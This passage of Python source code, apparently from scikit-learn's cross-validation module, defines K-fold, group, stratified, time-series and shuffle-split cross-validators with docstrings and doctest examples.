n_splits={0} greater\"\n \" than the number of samples: {1}.\").format(self.n_splits,\n n_samples))\n\n for train, test in super(_BaseKFold, self).split(X, y, groups):\n yield train, test\n\n def get_n_splits(self, X=None, y=None, groups=None):\n \"\"\"Returns the number of splitting iterations in the cross-validator\n\n Parameters\n ----------\n X : object\n Always ignored, exists for compatibility.\n\n y : object\n Always ignored, exists for compatibility.\n\n groups : object\n Always ignored, exists for compatibility.\n\n Returns\n -------\n n_splits : int\n Returns the number of splitting iterations in the cross-validator.\n \"\"\"\n return self.n_splits\n\n\nclass KFold(_BaseKFold):\n \"\"\"K-Folds cross-validator\n\n Provides train/test indices to split data in train/test sets. 
Split\n dataset into k consecutive folds (without shuffling by default).\n\n Each fold is then used once as a validation while the k - 1 remaining\n folds form the training set.\n\n Read more in the :ref:`User Guide `.\n\n Parameters\n ----------\n n_splits : int, default=3\n Number of folds. Must be at least 2.\n\n shuffle : boolean, optional\n Whether to shuffle the data before splitting into batches.\n\n random_state : None, int or RandomState\n When shuffle=True, pseudo-random number generator state used for\n shuffling. If None, use default numpy RNG for shuffling.\n\n Examples\n --------\n >>> from sklearn.model_selection import KFold\n >>> X = np.array([[1, 2], [3, 4], [1, 2], [3, 4]])\n >>> y = np.array([1, 2, 3, 4])\n >>> kf = KFold(n_splits=2)\n >>> kf.get_n_splits(X)\n 2\n >>> print(kf) # doctest: +NORMALIZE_WHITESPACE\n KFold(n_splits=2, random_state=None, shuffle=False)\n >>> for train_index, test_index in kf.split(X):\n ... print(\"TRAIN:\", train_index, \"TEST:\", test_index)\n ... X_train, X_test = X[train_index], X[test_index]\n ... y_train, y_test = y[train_index], y[test_index]\n TRAIN: [2 3] TEST: [0 1]\n TRAIN: [0 1] TEST: [2 3]\n\n Notes\n -----\n The first ``n_samples % n_splits`` folds have size\n ``n_samples // n_splits + 1``, other folds have size\n ``n_samples // n_splits``, where ``n_samples`` is the number of samples.\n\n See also\n --------\n StratifiedKFold\n Takes group information into account to avoid building folds with\n imbalanced class distributions (for binary or multiclass\n classification tasks).\n\n GroupKFold: K-fold iterator variant with non-overlapping groups.\n \"\"\"\n\n def __init__(self, n_splits=3, shuffle=False,\n random_state=None):\n super(KFold, self).__init__(n_splits, shuffle, random_state)\n\n def _iter_test_indices(self, X, y=None, groups=None):\n n_samples = _num_samples(X)\n indices = np.arange(n_samples)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n\n n_splits = self.n_splits\n fold_sizes = (n_samples // n_splits) * np.ones(n_splits, dtype=np.int)\n fold_sizes[:n_samples % n_splits] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass GroupKFold(_BaseKFold):\n \"\"\"K-fold iterator variant with non-overlapping groups.\n\n The same group will not appear in two different folds (the number of\n distinct groups has to be at least equal to the number of folds).\n\n The folds are approximately balanced in the sense that the number of\n distinct groups is approximately the same in each fold.\n\n Parameters\n ----------\n n_splits : int, default=3\n Number of folds. Must be at least 2.\n\n Examples\n --------\n >>> from sklearn.model_selection import GroupKFold\n >>> X = np.array([[1, 2], [3, 4], [5, 6], [7, 8]])\n >>> y = np.array([1, 2, 3, 4])\n >>> groups = np.array([0, 0, 2, 2])\n >>> group_kfold = GroupKFold(n_splits=2)\n >>> group_kfold.get_n_splits(X, y, groups)\n 2\n >>> print(group_kfold)\n GroupKFold(n_splits=2)\n >>> for train_index, test_index in group_kfold.split(X, y, groups):\n ... print(\"TRAIN:\", train_index, \"TEST:\", test_index)\n ... X_train, X_test = X[train_index], X[test_index]\n ... y_train, y_test = y[train_index], y[test_index]\n ... 
print(X_train, X_test, y_train, y_test)\n ...\n TRAIN: [0 1] TEST: [2 3]\n [[1 2]\n [3 4]] [[5 6]\n [7 8]] [1 2] [3 4]\n TRAIN: [2 3] TEST: [0 1]\n [[5 6]\n [7 8]] [[1 2]\n [3 4]] [3 4] [1 2]\n\n See also\n --------\n LeaveOneGroupOut\n For splitting the data according to explicit domain-specific\n stratification of the dataset.\n \"\"\"\n def __init__(self, n_splits=3):\n super(GroupKFold, self).__init__(n_splits, shuffle=False,\n random_state=None)\n\n def _iter_test_indices(self, X, y, groups):\n if groups is None:\n raise ValueError(\"The groups parameter should not be None\")\n groups = check_array(groups, ensure_2d=False, dtype=None)\n\n unique_groups, groups = np.unique(groups, return_inverse=True)\n n_groups = len(unique_groups)\n\n if self.n_splits > n_groups:\n raise ValueError(\"Cannot have number of splits n_splits=%d greater\"\n \" than the number of groups: %d.\"\n % (self.n_splits, n_groups))\n\n # Weight groups by their number of occurrences\n n_samples_per_group = np.bincount(groups)\n\n # Distribute the most frequent groups first\n indices = np.argsort(n_samples_per_group)[::-1]\n n_samples_per_group = n_samples_per_group[indices]\n\n # Total weight of each fold\n n_samples_per_fold = np.zeros(self.n_splits)\n\n # Mapping from group index to fold index\n group_to_fold = np.zeros(len(unique_groups))\n\n # Distribute samples by adding the largest weight to the lightest fold\n for group_index, weight in enumerate(n_samples_per_group):\n lightest_fold = np.argmin(n_samples_per_fold)\n n_samples_per_fold[lightest_fold] += weight\n group_to_fold[indices[group_index]] = lightest_fold\n\n indices = group_to_fold[groups]\n\n for f in range(self.n_splits):\n yield np.where(indices == f)[0]\n\n\nclass StratifiedKFold(_BaseKFold):\n \"\"\"Stratified K-Folds cross-validator\n\n Provides train/test indices to split data in train/test sets.\n\n This cross-validation object is a variation of KFold that returns\n stratified folds. The folds are made by preserving the percentage of\n samples for each class.\n\n Read more in the :ref:`User Guide `.\n\n Parameters\n ----------\n n_splits : int, default=3\n Number of folds. Must be at least 2.\n\n shuffle : boolean, optional\n Whether to shuffle each stratification of the data before splitting\n into batches.\n\n random_state : None, int or RandomState\n When shuffle=True, pseudo-random number generator state used for\n shuffling. If None, use default numpy RNG for shuffling.\n\n Examples\n --------\n >>> from sklearn.model_selection import StratifiedKFold\n >>> X = np.array([[1, 2], [3, 4], [1, 2], [3, 4]])\n >>> y = np.array([0, 0, 1, 1])\n >>> skf = StratifiedKFold(n_splits=2)\n >>> skf.get_n_splits(X, y)\n 2\n >>> print(skf) # doctest: +NORMALIZE_WHITESPACE\n StratifiedKFold(n_splits=2, random_state=None, shuffle=False)\n >>> for train_index, test_index in skf.split(X, y):\n ... print(\"TRAIN:\", train_index, \"TEST:\", test_index)\n ... X_train, X_test = X[train_index], X[test_index]\n ... 
y_train, y_test = y[train_index], y[test_index]\n TRAIN: [1 3] TEST: [0 2]\n TRAIN: [0 2] TEST: [1 3]\n\n Notes\n -----\n All the folds have size ``trunc(n_samples / n_splits)``, the last one has\n the complementary.\n\n \"\"\"\n\n def __init__(self, n_splits=3, shuffle=False, random_state=None):\n super(StratifiedKFold, self).__init__(n_splits, shuffle, random_state)\n\n def _make_test_folds(self, X, y=None, groups=None):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = np.asarray(y)\n n_samples = y.shape[0]\n unique_y, y_inversed = np.unique(y, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_groups = np.min(y_counts)\n if np.all(self.n_splits > y_counts):\n raise ValueError(\"All the n_groups for individual classes\"\n \" are less than n_splits=%d.\"\n % (self.n_splits))\n if self.n_splits > min_groups:\n warnings.warn((\"The least populated class in y has only %d\"\n \" members, which is too few. The minimum\"\n \" number of groups for any class cannot\"\n \" be less than n_splits=%d.\"\n % (min_groups, self.n_splits)), Warning)\n\n # pre-assign each sample to a test fold index using individual KFold\n # splitting strategies for each class so as to respect the balance of\n # classes\n # NOTE: Passing the data corresponding to ith class say X[y==class_i]\n # will break when the data is not 100% stratifiable for all classes.\n # So we pass np.zeroes(max(c, n_splits)) as data to the KFold\n per_cls_cvs = [\n KFold(self.n_splits, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_splits)))\n for count in y_counts]\n\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[y == cls]\n # the test split can be too big because we used\n # KFold(...).split(X[:max(c, n_splits)]) when data is not 100%\n # stratifiable for all the classes\n # (we use a warning instead of raising an exception)\n # If this is the case, let's trim it:\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[y == cls] = cls_test_folds\n\n return test_folds\n\n def _iter_test_masks(self, X, y=None, groups=None):\n test_folds = self._make_test_folds(X, y)\n for i in range(self.n_splits):\n yield test_folds == i\n\n def split(self, X, y, groups=None):\n \"\"\"Generate indices to split data into training and test set.\n\n Parameters\n ----------\n X : array-like, shape (n_samples, n_features)\n Training data, where n_samples is the number of samples\n and n_features is the number of features.\n\n Note that providing ``y`` is sufficient to generate the splits and\n hence ``np.zeros(n_samples)`` may be used as a placeholder for\n ``X`` instead of actual training data.\n\n y : array-like, shape (n_samples,)\n The target variable for supervised learning problems.\n Stratification is done based on the y labels.\n\n groups : object\n Always ignored, exists for compatibility.\n\n Returns\n -------\n train : ndarray\n The training set indices for that split.\n\n test : ndarray\n The testing set indices for that split.\n \"\"\"\n y = check_array(y, ensure_2d=False, dtype=None)\n return super(StratifiedKFold, self).split(X, y, groups)\n\n\nclass TimeSeriesSplit(_BaseKFold):\n \"\"\"Time Series cross-validator\n\n Provides train/test indices to split time series data samples\n that are observed at fixed time intervals, in 
train/test sets.\n In each split, test indices must be higher than before, and thus shuffling\n in cross validator is inappropriate.\n\n This cross-validation object is a variation of :class:`KFold`.\n In the kth split, it returns first k folds as train set and the\n (k+1)th fold as test set.\n\n Note that unlike standard cross-validation methods, successive\n training sets are supersets of those that come before them.\n\n Read more in the :ref:`User Guide `.\n\n Parameters\n ----------\n n_splits : int, default=3\n Number of splits. Must be at least 1.\n\n Examples\n --------\n >>> from sklearn.model_selection import TimeSeriesSplit\n >>> X = np.array([[1, 2], [3, 4], [1, 2], [3, 4]])\n >>> y = np.array([1, 2, 3, 4])\n >>> tscv = TimeSeriesSplit(n_splits=3)\n >>> print(tscv) # doctest: +NORMALIZE_WHITESPACE\n TimeSeriesSplit(n_splits=3)\n >>> for train_index, test_index in tscv.split(X):\n ... print(\"TRAIN:\", train_index, \"TEST:\", test_index)\n ... X_train, X_test = X[train_index], X[test_index]\n ... y_train, y_test = y[train_index], y[test_index]\n TRAIN: [0] TEST: [1]\n TRAIN: [0 1] TEST: [2]\n TRAIN: [0 1 2] TEST: [3]\n\n Notes\n -----\n The training set has size ``i * n_samples // (n_splits + 1)\n + n_samples % (n_splits + 1)`` in the ``i``th split,\n with a test set of size ``n_samples//(n_splits + 1)``,\n where ``n_samples`` is the number of samples.\n \"\"\"\n def __init__(self, n_splits=3):\n super(TimeSeriesSplit, self).__init__(n_splits,\n shuffle=False,\n random_state=None)\n\n def split(self, X, y=None, groups=None):\n \"\"\"Generate indices to split data into training and test set.\n\n Parameters\n ----------\n X : array-like, shape (n_samples, n_features)\n Training data, where n_samples is the number of samples\n and n_features is the number of features.\n\n y : array-like, shape (n_samples,)\n Always ignored, exists for compatibility.\n\n groups : array-like, with shape (n_samples,), optional\n Always ignored, exists for compatibility.\n\n Returns\n -------\n train : ndarray\n The training set indices for that split.\n\n test : ndarray\n The testing set indices for that split.\n \"\"\"\n X, y, groups = indexable(X, y, groups)\n n_samples = _num_samples(X)\n n_splits = self.n_splits\n n_folds = n_splits + 1\n if n_folds > n_samples:\n raise ValueError(\n (\"Cannot have number of folds ={0} greater\"\n \" than the number of samples: {1}.\").format(n_folds,\n n_samples))\n indices = np.arange(n_samples)\n test_size = (n_samples // n_folds)\n test_starts = range(test_size + n_samples % n_folds,\n n_samples, test_size)\n for test_start in test_starts:\n yield (indices[:test_start],\n indices[test_start:test_start + test_size])\n\n\nclass LeaveOneGroupOut(BaseCrossValidator):\n \"\"\"Leave One Group Out cross-validator\n\n Provides train/test indices to split data according to a third-party\n provided group. 
This group information can be used to encode arbitrary\n domain specific stratifications of the samples as integers.\n\n For instance the groups could be the year of collection of the samples\n and thus allow for cross-validation against time-based splits.\n\n Read more in the :ref:`User Guide `.\n\n Examples\n --------\n >>> from sklearn.model_selection import LeaveOneGroupOut\n >>> X = np.array([[1, 2], [3, 4], [5, 6], [7, 8]])\n >>> y = np.array([1, 2, 1, 2])\n >>> groups = np.array([1, 1, 2, 2])\n >>> logo = LeaveOneGroupOut()\n >>> logo.get_n_splits(X, y, groups)\n 2\n >>> print(logo)\n LeaveOneGroupOut()\n >>> for train_index, test_index in logo.split(X, y, groups):\n ... print(\"TRAIN:\", train_index, \"TEST:\", test_index)\n ... X_train, X_test = X[train_index], X[test_index]\n ... y_train, y_test = y[train_index], y[test_index]\n ... print(X_train, X_test, y_train, y_test)\n TRAIN: [2 3] TEST: [0 1]\n [[5 6]\n [7 8]] [[1 2]\n [3 4]] [1 2] [1 2]\n TRAIN: [0 1] TEST: [2 3]\n [[1 2]\n [3 4]] [[5 6]\n [7 8]] [1 2] [1 2]\n\n \"\"\"\n\n def _iter_test_masks(self, X, y, groups):\n if groups is None:\n raise ValueError(\"The groups parameter should not be None\")\n # We make a copy of groups to avoid side-effects during iteration\n groups = check_array(groups, copy=True, ensure_2d=False, dtype=None)\n unique_groups = np.unique(groups)\n if len(unique_groups) <= 1:\n raise ValueError(\n \"The groups parameter contains fewer than 2 unique groups \"\n \"(%s). LeaveOneGroupOut expects at least 2.\" % unique_groups)\n for i in unique_groups:\n yield groups == i\n\n def get_n_splits(self, X, y, groups):\n \"\"\"Returns the number of splitting iterations in the cross-validator\n\n Parameters\n ----------\n X : object\n Always ignored, exists for compatibility.\n\n y : object\n Always ignored, exists for compatibility.\n\n groups : array-like, with shape (n_samples,), optional\n Group labels for the samples used while splitting the dataset into\n train/test set.\n\n Returns\n -------\n n_splits : int\n Returns the number of splitting iterations in the cross-validator.\n \"\"\"\n if groups is None:\n raise ValueError(\"The groups parameter should not be None\")\n return len(np.unique(groups))\n\n\nclass LeavePGroupsOut(BaseCrossValidator):\n \"\"\"Leave P Group(s) Out cross-validator\n\n Provides train/test indices to split data according to a third-party\n provided group. This group information can be used to encode arbitrary\n domain specific stratifications of the samples as integers.\n\n For instance the groups could be the year of collection of the samples\n and thus allow for cross-validation against time-based splits.\n\n The difference between LeavePGroupsOut and LeaveOneGroupOut is that\n the former builds the test sets with all the samples assigned to\n ``p`` different values of the groups while the latter uses samples\n all assigned the same groups.\n\n Read more in the :ref:`User Guide `.\n\n Parameters\n ----------\n n_groups : int\n Number of groups (``p``) to leave out in the test split.\n\n Examples\n --------\n >>> from sklearn.model_selection import LeavePGroupsOut\n >>> X = np.array([[1, 2], [3, 4], [5, 6]])\n >>> y = np.array([1, 2, 1])\n >>> groups = np.array([1, 2, 3])\n >>> lpgo = LeavePGroupsOut(n_groups=2)\n >>> lpgo.get_n_splits(X, y, groups)\n 3\n >>> print(lpgo)\n LeavePGroupsOut(n_groups=2)\n >>> for train_index, test_index in lpgo.split(X, y, groups):\n ... print(\"TRAIN:\", train_index, \"TEST:\", test_index)\n ... 
X_train, X_test = X[train_index], X[test_index]\n ... y_train, y_test = y[train_index], y[test_index]\n ... print(X_train, X_test, y_train, y_test)\n TRAIN: [2] TEST: [0 1]\n [[5 6]] [[1 2]\n [3 4]] [1] [1 2]\n TRAIN: [1] TEST: [0 2]\n [[3 4]] [[1 2]\n [5 6]] [2] [1 1]\n TRAIN: [0] TEST: [1 2]\n [[1 2]] [[3 4]\n [5 6]] [1] [2 1]\n\n See also\n --------\n GroupKFold: K-fold iterator variant with non-overlapping groups.\n \"\"\"\n\n def __init__(self, n_groups):\n self.n_groups = n_groups\n\n def _iter_test_masks(self, X, y, groups):\n if groups is None:\n raise ValueError(\"The groups parameter should not be None\")\n groups = check_array(groups, copy=True, ensure_2d=False, dtype=None)\n unique_groups = np.unique(groups)\n if self.n_groups >= len(unique_groups):\n raise ValueError(\n \"The groups parameter contains fewer than (or equal to) \"\n \"n_groups (%d) numbers of unique groups (%s). LeavePGroupsOut \"\n \"expects that at least n_groups + 1 (%d) unique groups be \"\n \"present\" % (self.n_groups, unique_groups, self.n_groups + 1))\n combi = combinations(range(len(unique_groups)), self.n_groups)\n for indices in combi:\n test_index = np.zeros(_num_samples(X), dtype=np.bool)\n for l in unique_groups[np.array(indices)]:\n test_index[groups == l] = True\n yield test_index\n\n def get_n_splits(self, X, y, groups):\n \"\"\"Returns the number of splitting iterations in the cross-validator\n\n Parameters\n ----------\n X : object\n Always ignored, exists for compatibility.\n ``np.zeros(n_samples)`` may be used as a placeholder.\n\n y : object\n Always ignored, exists for compatibility.\n ``np.zeros(n_samples)`` may be used as a placeholder.\n\n groups : array-like, with shape (n_samples,), optional\n Group labels for the samples used while splitting the dataset into\n train/test set.\n\n Returns\n -------\n n_splits : int\n Returns the number of splitting iterations in the cross-validator.\n \"\"\"\n if groups is None:\n raise ValueError(\"The groups parameter should not be None\")\n groups = check_array(groups, ensure_2d=False, dtype=None)\n X, y, groups = indexable(X, y, groups)\n return int(comb(len(np.unique(groups)), self.n_groups, exact=True))\n\n\nclass BaseShuffleSplit(with_metaclass(ABCMeta)):\n \"\"\"Base class for ShuffleSplit and StratifiedShuffleSplit\"\"\"\n\n def __init__(self, n_splits=10, test_size=0.1, train_size=None,\n random_state=None):\n _validate_shuffle_split_init(test_size, train_size)\n self.n_splits = n_splits\n self.test_size = test_size\n self.train_size = train_size\n self.random_state = random_state\n\n def split(self, X, y=None, groups=None):\n \"\"\"Generate indices to split data into training and test set.\n\n Parameters\n ----------\n X : array-like, shape (n_samples, n_features)\n Training data, where n_samples is the number of samples\n and n_features is the number of features.\n\n y : array-like, shape (n_samples,)\n The target variable for supervised learning problems.\n\n groups : array-like, with shape (n_samples,), optional\n Group labels for the samples used while splitting the dataset into\n train/test set.\n\n Returns\n -------\n train : ndarray\n The training set indices for that split.\n\n test : ndarray\n The testing set indices for that split.\n \"\"\"\n X, y, groups = indexable(X, y, groups)\n for train, test in self._iter_indices(X, y, groups):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, X, y=None, groups=None):\n \"\"\"Generate (train, test) indices\"\"\"\n\n def get_n_splits(self, X=None, y=None, groups=None):\n 
\"\"\"Returns the number of splitting iterations in the cross-validator\n\n Parameters\n ----------\n X : object\n Always ignored, exists for compatibility.\n\n y : object\n Always ignored, exists for compatibility.\n\n groups : object\n Always ignored, exists for compatibility.\n\n Returns\n -------\n n_splits : int\n Returns the number of splitting iterations in the cross-validator.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass ShuffleSplit(BaseShuffleSplit):\n \"\"\"Random permutation cross-validator\n\n Yields indices to split data into training and test sets.\n\n Note: contrary to other cross-validation strategies, random splits\n do not guarantee that all folds will be different, although this is\n still very likely for sizeable datasets.\n\n Read more in the :ref:`User Guide `.\n\n Parameters\n ----------\n n_splits : int (default 10)\n Number of re-shuffling & splitting iterations.\n\n test_size : float, int, or None, default 0.1\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the dataset to include in the test split. If\n int, represents the absolute number of test samples. If None,\n the value is automatically set to the complement of the train size.\n\n train_size : float, int, or None (default is None)\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the dataset to include in the train split. If\n int, represents the absolute number of train samples. If None,\n the value is automatically set to the complement of the test size.\n\n random_state : int or RandomState\n Pseudo-random number generator state used for random sampling.\n\n Examples\n --------\n >>> from sklearn.model_selection import ShuffleSplit\n >>> X = np.array([[1, 2], [3, 4], [5, 6], [7, 8]])\n >>> y = np.array([1, 2, 1, 2])\n >>> rs = ShuffleSplit(n_splits=3, test_size=.25, random_state=0)\n >>> rs.get_n_splits(X)\n 3\n >>> print(rs)\n ShuffleSplit(n_splits=3, random_state=0, test_size=0.25, train_size=None)\n >>> for train_index, test_index in rs.split(X):\n ... print(\"TRAIN:\", train_index, \"TEST:\", test_index)\n ... # doctest: +ELLIPSIS\n TRAIN: [3 1 0] TEST: [2]\n TRAIN: [2 1 3] TEST: [0]\n TRAIN: [0 2 1] TEST: [3]\n >>> rs = ShuffleSplit(n_splits=3, train_size=0.5, test_size=.25,\n ... random_state=0)\n >>> for train_index, test_index in rs.split(X):\n ... print(\"TRAIN:\", train_index, \"TEST:\", test_index)\n ... # doctest: +ELLIPSIS\n TRAIN: [3 1] TEST: [2]\n TRAIN: [2 1] TEST: [0]\n TRAIN: [0 2] TEST: [3]\n \"\"\"\n\n def _iter_indices(self, X, y=None, groups=None):\n n_samples = _num_samples(X)\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n # random partition\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:(n_test + n_train)]\n yield ind_train, ind_test\n\n\nclass GroupShuffleSplit(ShuffleSplit):\n '''Shuffle-Group(s)-Out cross-validation iterator\n\n Provides randomized train/test indices to split data according to a\n third-party provided group. 
This group information can be used to encode\n arbitrary domain specific stratifications of the samples as integers.\n\n For instance the groups could be the year of collection of the samples\n and thus allow for cross-validation against time-based splits.\n\n The difference between LeavePGroupsOut and GroupShuffleSplit is that\n the former generates splits using all subsets of size ``p`` unique groups,\n whereas GroupShuffleSplit generates a user-determined number of random\n test splits, each with a user-determined fraction of unique groups.\n\n For example, a less computationally intensive alternative to\n ``LeavePGroupsOut(p=10)`` would be\n ``GroupShuffleSplit(test_size=10, n_splits=100)``.\n\n Note: The parameters ``test_size`` and ``train_size`` refer to groups, and\n not to samples, as in ShuffleSplit.\n\n\n Parameters\n ----------\n n_splits : int (default 5)\n Number of re-shuffling & splitting iterations.\n\n test_size : float (default 0.2), int, or None\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the groups to include in the test split. If\n int, represents the absolute number of test groups. If None,\n the value is automatically set to the complement of the train size.\n\n train_size : float, int, or None (default is None)\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the groups to include in the train split. If\n int, represents the absolute number of train groups. If None,\n the value is automatically set to the complement of the test size.\n\n random_state : int or RandomState\n Pseudo-random number generator state used for random sampling.\n '''\n\n def __init__(self, n_splits=5, test_size=0.2, train_size=None,\n random_state=None):\n super(GroupShuffleSplit, self).__init__(\n n_splits=n_splits,\n test_size=test_size,\n train_size=train_size,\n random_state=random_state)\n\n def _iter_indices(self, X, y, groups):\n if groups is None:\n raise ValueError(\"The groups parameter should not be None\")\n groups = check_array(groups, ensure_2d=False, dtype=None)\n classes, group_indices = np.unique(groups, return_inverse=True)\n for group_train, group_test in super(\n GroupShuffleSplit, self)._iter_indices(X=classes):\n # these are the indices of classes in the partition\n # invert them into data indices\n\n train = np.flatnonzero(np.in1d(group_indices, group_train))\n test = np.flatnonzero(np.in1d(group_indices, group_test))\n\n yield train, test\n\n\ndef _approximate_mode(class_counts, n_draws, rng):\n \"\"\"Computes approximate mode of multivariate hypergeometric.\n\n This is an approximation to the mode of the multivariate\n hypergeometric given by class_counts and n_draws.\n It shouldn't be off by more than one.\n\n It is the mostly likely outcome of drawing n_draws many\n samples from the population given by class_counts.\n\n Parameters\n ----------\n class_counts : ndarray of int\n Population per class.\n n_draws : int\n Number of draws (samples to draw) from the overall population.\n rng : random state\n Used to break ties.\n\n Returns\n -------\n sampled_classes : ndarray of int\n Number of samples drawn from each class.\n np.sum(sampled_classes) == n_draws\n\n Examples\n --------\n >>> from sklearn.model_selection._split import _approximate_mode\n >>> _approximate_mode(class_counts=np.array([4, 2]), n_draws=3, rng=0)\n array([2, 1])\n >>> _approximate_mode(class_counts=np.array([5, 2]), n_draws=4, rng=0)\n array([3, 1])\n >>> _approximate_mode(class_counts=np.array([2, 2, 2, 1]),\n ... 
n_draws=2, rng=0)\n array([0, 1, 1, 0])\n >>> _approximate_mode(class_counts=np.array([2, 2, 2, 1]),\n ... n_draws=2, rng=42)\n array([1, 1, 0, 0])\n \"\"\"\n # this computes a bad approximation to the mode of the\n # multivariate hypergeometric given by class_counts and n_draws\n continuous = n_draws * class_counts / class_counts.sum()\n # floored means we don't overshoot n_samples, but probably undershoot\n floored = np.floor(continuous)\n # we add samples according to how much \"left over\" probability\n # they had, until we arrive at n_samples\n need_to_add = int(n_draws - floored.sum())\n if need_to_add > 0:\n remainder = continuous - floored\n values = np.sort(np.unique(remainder))[::-1]\n # add according to remainder, but break ties\n # randomly to avoid biases\n for value in values:\n inds, = np.where(remainder == value)\n # if we need_to_add less than what's in inds\n # we draw randomly from them.\n # if we need to add more, we add them all and\n # go to the next value\n add_now = min(len(inds), need_to_add)\n inds = choice(inds, size=add_now, replace=False, random_state=rng)\n floored[inds] += 1\n need_to_add -= add_now\n if need_to_add == 0:\n break\n return floored.astype(np.int)\n\n\nclass StratifiedShuffleSplit(BaseShuffleSplit):\n \"\"\"Stratified ShuffleSplit cross-validator\n\n Provides train/test indices to split data in train/test sets.\n\n This cross-validation object is a merge of StratifiedKFold and\n ShuffleSplit, which returns stratified randomized folds. The folds\n are made by preserving the percentage of samples for each class.\n\n Note: like the ShuffleSplit strategy, stratified random splits\n do not guarantee that all folds will be different, although this is\n still very likely for sizeable datasets.\n\n Read more in the :ref:`User Guide `.\n\n Parameters\n ----------\n n_splits : int (default 10)\n Number of re-shuffling & splitting iterations.\n\n test_size : float (default 0.1), int, or None\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the dataset to include in the test split. If\n int, represents the absolute number of test samples. If None,\n the value is automatically set to the complement of the train size.\n\n train_size : float, int, or None (default is None)\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the dataset to include in the train split. If\n int, represents the absolute number of train samples. If None,\n the value is automatically set to the complement of the test size.\n\n random_state : int or RandomState\n Pseudo-random number generator state used for random sampling.\n\n Examples\n --------\n >>> from sklearn.model_selection import StratifiedShuffleSplit\n >>> X = np.array([[1, 2], [3, 4], [1, 2], [3, 4]])\n >>> y = np.array([0, 0, 1, 1])\n >>> sss = StratifiedShuffleSplit(n_splits=3, test_size=0.5, random_state=0)\n >>> sss.get_n_splits(X, y)\n 3\n >>> print(sss) # doctest: +ELLIPSIS\n StratifiedShuffleSplit(n_splits=3, random_state=0, ...)\n >>> for train_index, test_index in sss.split(X, y):\n ... print(\"TRAIN:\", train_index, \"TEST:\", test_index)\n ... X_train, X_test = X[train_index], X[test_index]\n ... 
y_train, y_test = y[train_index], y[test_index]\n TRAIN: [1 2] TEST: [3 0]\n TRAIN: [0 2] TEST: [1 3]\n TRAIN: [0 2] TEST: [3 1]\n \"\"\"\n\n def __init__(self, n_splits=10, test_size=0.1, train_size=None,\n random_state=None):\n super(StratifiedShuffleSplit, self).__init__(\n n_splits, test_size, train_size, random_state)\n\n def _iter_indices(self, X, y, groups=None):\n n_samples = _num_samples(X)\n y = check_array(y, ensure_2d=False, dtype=None)\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n classes, y_indices = np.unique(y, return_inverse=True)\n n_classes = classes.shape[0]\n\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\"The least populated class in y has only 1\"\n \" member, which is too few. The minimum\"\n \" number of groups for any class cannot\"\n \" be less than 2.\")\n\n if n_train < n_classes:\n raise ValueError('The train_size = %d should be greater or '\n 'equal to the number of classes = %d' %\n (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError('The test_size = %d should be greater or '\n 'equal to the number of classes = %d' %\n (n_test, n_classes))\n\n rng = check_random_state(self.random_state)\n\n for _ in range(self.n_splits):\n # if there are ties in the class-counts, we want\n # to make sure to break them anew in each iteration\n n_i = _approximate_mode(class_counts, n_train, rng)\n class_counts_remaining = class_counts - n_i\n t_i = _approximate_mode(class_counts_remaining, n_test, rng)\n\n train = []\n test = []\n\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where((y == class_i))[0][permutation]\n\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n train = rng.permutation(train)\n test = rng.permutation(test)\n\n yield train, test\n\n def split(self, X, y, groups=None):\n \"\"\"Generate indices to split data into training and test set.\n\n Parameters\n ----------\n X : array-like, shape (n_samples, n_features)\n Training data, where n_samples is the number of samples\n and n_features is the number of features.\n\n Note that providing ``y`` is sufficient to generate the splits and\n hence ``np.zeros(n_samples)`` may be used as a placeholder for\n ``X`` instead of actual training data.\n\n y : array-like, shape (n_samples,)\n The target variable for supervised learning problems.\n Stratification is done based on the y labels.\n\n groups : object\n Always ignored, exists for compatibility.\n\n Returns\n -------\n train : ndarray\n The training set indices for that split.\n\n test : ndarray\n The testing set indices for that split.\n \"\"\"\n y = check_array(y, ensure_2d=False, dtype=None)\n return super(StratifiedShuffleSplit, self).split(X, y, groups)\n\n\ndef _validate_shuffle_split_init(test_size, train_size):\n \"\"\"Validation helper to check the test_size and train_size at init\n\n NOTE This does not take into account the number of samples which is known\n only at split\n \"\"\"\n if test_size is None and train_size is None:\n raise ValueError('test_size and train_size can not both be None')\n\n if test_size is not None:\n if np.asarray(test_size).dtype.kind == 'f':\n if test_size >= 1.:\n raise ValueError(\n 'test_size=%f should be smaller '\n 'than 1.0 or be an integer' % test_size)\n elif np.asarray(test_size).dtype.kind != 'i':\n # int values are checked during split based on the input\n raise ValueError(\"Invalid value for 
